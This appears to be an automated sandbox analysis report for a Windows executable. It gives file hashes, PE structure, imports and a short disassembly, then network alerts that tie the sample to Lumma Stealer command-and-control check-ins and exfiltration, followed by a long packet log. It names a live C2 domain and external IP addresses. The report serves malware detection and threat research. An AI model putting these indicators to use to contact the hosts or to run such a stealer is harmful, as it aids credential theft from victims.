                                                                                                  SHA-256:95F5F5816DB7D7550E58DE63D122F7F56C96ACDA004B5C0640F603C7AED7D520
                                                                                                  SHA-512:79E3120D8C75F08494A70B051F04A99D3D2DD917BBBAB1CF1927B778E4F3AB49E5557108C6CE36A899F5BA22E55F91BDE0797E08DA90675E3E852E6968EB3BFF
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..U&G_................................................................................................................................................................................................................................................................................................................................................C.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.548929914424185
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:IH5XqCdf06.exe
                                                                                                  File size:371'712 bytes
                                                                                                  MD5:3bd2d12ed926118beb65b4cf48b49d5b
                                                                                                  SHA1:fc96032acd8e41c011285de8962921fc1ec3f8fd
                                                                                                  SHA256:d7d33c7a50fee99828789a17ae33a36d37c0c6f6038083bbde88d1857f4400b7
                                                                                                  SHA512:d8c695f5b2ef629f86778b24b374ee372cbd37a7c9122f8226995c29609d9e95eebfd22c8393545e6e06b7d8a4577a2b4c1761c98d01c85e211e9173c8492580
                                                                                                  SSDEEP:6144:jLIKwTzUssd+NZg4DrrDEYOTXaUygGCl3HGguv/x2QHlG:jclToj6HEYWKUkChmJXx+
                                                                                                  TLSH:658402333590C572C85354325C79E6667BBEB9314BA982C737A427BE4F306E25B36382
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.!.g.OCg.OCg.OC...Cf.OCy..CB.OCy..C}.OCy..C..OC@O4C`.OCg.NC..OCy..Cf.OCy..Cf.OCy..Cf.OCRichg.OC........................PE..L..
                                                                                                  Icon Hash:46c7c30b0f4e0d59
                                                                                                  Entrypoint:0x404112
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x659E25BA [Wed Jan 10 05:06:02 2024 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:8a9e10db6f47f9c84718e65054144a04
                                                                                                  Instruction
                                                                                                  call 00007F2848EB403Ch
                                                                                                  jmp 00007F2848EB11EEh
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push edi
                                                                                                  mov edi, 000003E8h
                                                                                                  push edi
                                                                                                  call dword ptr [004010ACh]
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  call dword ptr [004010A8h]
                                                                                                  add edi, 000003E8h
                                                                                                  cmp edi, 0000EA60h
                                                                                                  jnbe 00007F2848EB1376h
                                                                                                  test eax, eax
                                                                                                  je 00007F2848EB1350h
                                                                                                  pop edi
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  call 00007F2848EB1AB6h
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  call 00007F2848EB1903h
                                                                                                  push dword ptr [0044F014h]
                                                                                                  call 00007F2848EB247Eh
                                                                                                  push 000000FFh
                                                                                                  call eax
                                                                                                  add esp, 0Ch
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push 00401260h
                                                                                                  call dword ptr [004010A8h]
                                                                                                  test eax, eax
                                                                                                  je 00007F2848EB1387h
                                                                                                  push 00401250h
                                                                                                  push eax
                                                                                                  call dword ptr [00401060h]
                                                                                                  test eax, eax
                                                                                                  je 00007F2848EB1377h
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  call eax
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  call 00007F2848EB133Dh
                                                                                                  pop ecx
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  call dword ptr [004010B0h]
                                                                                                  int3
                                                                                                  push 00000008h
                                                                                                  call 00007F2848EB41A6h
                                                                                                  pop ecx
                                                                                                  ret
                                                                                                  push 00000008h
                                                                                                  call 00007F2848EB40C3h
                                                                                                  pop ecx
                                                                                                  ret
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  mov esi, eax
                                                                                                  jmp 00007F2848EB137Dh
                                                                                                  mov eax, dword ptr [esi]
                                                                                                  test eax, eax
                                                                                                  je 00007F2848EB1374h
                                                                                                  Programming Language:
                                                                                                  • [C++] VS2008 build 21022
                                                                                                  • [ASM] VS2008 build 21022
                                                                                                  • [ C ] VS2008 build 21022
                                                                                                  • [IMP] VS2005 build 50727
                                                                                                  • [RES] VS2008 build 21022
                                                                                                  • [LNK] VS2008 build 21022
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x4dd8c0x50.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x6fd0.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d780x40.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x190.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x4d6b20x4d800078440d3dff489c5ab4209b9b434f083False0.9060011340725806data7.876615691917127IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .data0x4f0000xaba40x6000bfe10e4ff7467fe950c2dd24201db05cFalse0.08011881510416667Matlab v4 mat-file (little endian) \322C@, rows 0, columns 00.9409074254870606IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0x5a0000xdfd00x7000c76c867a351f82f92797b8793d572b35False0.7533133370535714data6.50528471946842IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_CURSOR0x602800x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                                                  RT_CURSOR0x605b00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                                                                  RT_ICON0x5a3900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRomanianRomania0.8054371002132196
                                                                                                  RT_ICON0x5b2380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRomanianRomania0.842057761732852
                                                                                                  RT_ICON0x5bae00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsRomanianRomania0.7880184331797235
                                                                                                  RT_ICON0x5c1a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRomanianRomania0.8367052023121387
                                                                                                  RT_ICON0x5c7100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216RomanianRomania0.8063278008298755
                                                                                                  RT_ICON0x5ecb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096RomanianRomania0.8320825515947468
                                                                                                  RT_ICON0x5fd600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024RomanianRomania0.8617021276595744
                                                                                                  RT_STRING0x609280x3ceAmigaOS bitmap font "i", fc_YSize 30720, 19456 elements, 2nd "f", 3rd "v"RomanianRomania0.4650924024640657
                                                                                                  RT_STRING0x60cf80x2d2dataRomanianRomania0.4806094182825485
                                                                                                  RT_ACCELERATOR0x602300x50dataRomanianRomania0.8125
                                                                                                  RT_GROUP_CURSOR0x606e00x22data1.0294117647058822
                                                                                                  RT_GROUP_ICON0x601c80x68dataRomanianRomania0.6826923076923077
                                                                                                  RT_VERSION0x607080x21cdata0.5166666666666667
                                                                                                  DLLImport
                                                                                                  KERNEL32.dllSetLocaleInfoA, InterlockedIncrement, EnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, WriteConsoleInputA, SetComputerNameW, FreeEnvironmentStringsA, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, SetCommConfig, SwitchToFiber, ReadConsoleInputA, GetVersionExW, GetAtomNameW, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, LoadLibraryA, OpenEventA, FindNextFileA, EnumDateFormatsA, GetModuleHandleA, TerminateJobObject, GetCurrentProcessId, FindNextVolumeA, CreateFileA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, IsDebuggerPresent, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, HeapFree, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, RaiseException, SetStdHandle, GetLocaleInfoA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, CloseHandle
                                                                                                  USER32.dllOemToCharA, DdeQueryStringA, GetWindowTextLengthA
                                                                                                  SHELL32.dllDragQueryPoint
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  RomanianRomania
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2025-01-05T08:55:03.458660+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649709104.21.56.70443TCP
                                                                                                  2025-01-05T08:55:04.280937+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649710176.113.115.1980TCP
                                                                                                  2025-01-05T08:55:06.404895+01002058606ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)1192.168.2.6647541.1.1.153UDP
                                                                                                  2025-01-05T08:55:06.910759+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.649712104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:06.910759+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:07.396177+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649712104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:07.396177+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649712104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:07.885954+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.649713104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:07.885954+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649713104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:08.367233+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649713104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:08.367233+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649713104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:09.156393+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.649715104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:09.156393+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649715104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:10.266983+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.649721104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:10.266983+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649721104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:10.783541+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649721104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:11.921604+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.649732104.21.96.1443TCP
                                                                                                  2025-01-05T08:55:11.921604+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649732104.21.96.1443TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 5, 2025 08:55:02.545630932 CET49709443192.168.2.6104.21.56.70
                                                                                                  Jan 5, 2025 08:55:02.545671940 CET44349709104.21.56.70192.168.2.6
                                                                                                  Jan 5, 2025 08:55:02.545761108 CET49709443192.168.2.6104.21.56.70
                                                                                                  Jan 5, 2025 08:55:02.557060003 CET49709443192.168.2.6104.21.56.70
                                                                                                  Jan 5, 2025 08:55:02.557075024 CET44349709104.21.56.70192.168.2.6
                                                                                                  Jan 5, 2025 08:55:03.019767046 CET44349709104.21.56.70192.168.2.6
                                                                                                  Jan 5, 2025 08:55:03.019871950 CET49709443192.168.2.6104.21.56.70
                                                                                                  Jan 5, 2025 08:55:03.146992922 CET49709443192.168.2.6104.21.56.70
                                                                                                  Jan 5, 2025 08:55:03.147016048 CET44349709104.21.56.70192.168.2.6
                                                                                                  Jan 5, 2025 08:55:03.147317886 CET44349709104.21.56.70192.168.2.6
                                                                                                  Jan 5, 2025 08:55:03.147371054 CET49709443192.168.2.6104.21.56.70
                                                                                                  Jan 5, 2025 08:55:03.160909891 CET49709443192.168.2.6104.21.56.70
                                                                                                  Jan 5, 2025 08:55:03.203342915 CET44349709104.21.56.70192.168.2.6
                                                                                                  Jan 5, 2025 08:55:03.458678007 CET44349709104.21.56.70192.168.2.6
                                                                                                  Jan 5, 2025 08:55:03.458754063 CET49709443192.168.2.6104.21.56.70
                                                                                                  Jan 5, 2025 08:55:03.458760023 CET44349709104.21.56.70192.168.2.6
                                                                                                  Jan 5, 2025 08:55:03.458808899 CET49709443192.168.2.6104.21.56.70
                                                                                                  Jan 5, 2025 08:55:03.461407900 CET49709443192.168.2.6104.21.56.70
                                                                                                  Jan 5, 2025 08:55:03.461425066 CET44349709104.21.56.70192.168.2.6
                                                                                                  Jan 5, 2025 08:55:03.461460114 CET49709443192.168.2.6104.21.56.70
                                                                                                  Jan 5, 2025 08:55:03.461481094 CET49709443192.168.2.6104.21.56.70
                                                                                                  Jan 5, 2025 08:55:03.595237970 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:03.600084066 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:03.600177050 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:03.600347042 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:03.605331898 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.280798912 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.280817032 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.280901909 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.280926943 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.280936956 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.280936956 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.280981064 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.281002998 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.281014919 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.281028032 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.281038046 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.281050920 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.281059027 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.281071901 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.281104088 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.285912037 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.285923004 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.285929918 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.285937071 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.285995960 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.286036015 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.400638103 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.400654078 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.400830030 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.400840998 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.400852919 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.400873899 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.400928020 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.401065111 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.401098967 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.401113033 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.401143074 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.401158094 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.401170015 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.401184082 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.401196957 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.401216030 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.401245117 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.402045012 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.402055979 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.402067900 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.402077913 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.402095079 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.402105093 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.402106047 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.402124882 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.402134895 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.402167082 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.402857065 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.402904034 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.402915955 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.402942896 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.402955055 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.402964115 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.402967930 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.402991056 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.403018951 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.403738976 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.403791904 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.405874968 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.405886889 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.405934095 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.520629883 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.520648003 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.520711899 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.520756006 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.520764112 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.520782948 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.520791054 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.520797968 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.520811081 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.520824909 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.520850897 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.520936966 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521003962 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521027088 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521070004 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521070004 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521120071 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521172047 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521205902 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521219969 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521245003 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521250963 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521256924 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521265030 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521287918 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521303892 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521584034 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521595955 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521606922 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521619081 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521646976 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521646023 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521658897 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521672964 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521683931 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521687031 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521696091 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521708012 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521713972 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521728992 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521744967 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.521758080 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521783113 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.521801949 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.522336960 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522349119 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522365093 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522396088 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522408009 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522412062 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.522418022 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522432089 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522443056 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522444010 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.522458076 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.522459030 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522474051 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522485018 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522489071 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.522496939 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522510052 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.522526979 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.522526979 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.522552013 CET4971080192.168.2.6176.113.115.19
                                                                                                  Jan 5, 2025 08:55:04.523375988 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.523387909 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.523400068 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.523411036 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.523422956 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.523433924 CET8049710176.113.115.19192.168.2.6
                                                                                                  Jan 5, 2025 08:55:04.523438931 CET4971080192.168.2.6176.113.115.19
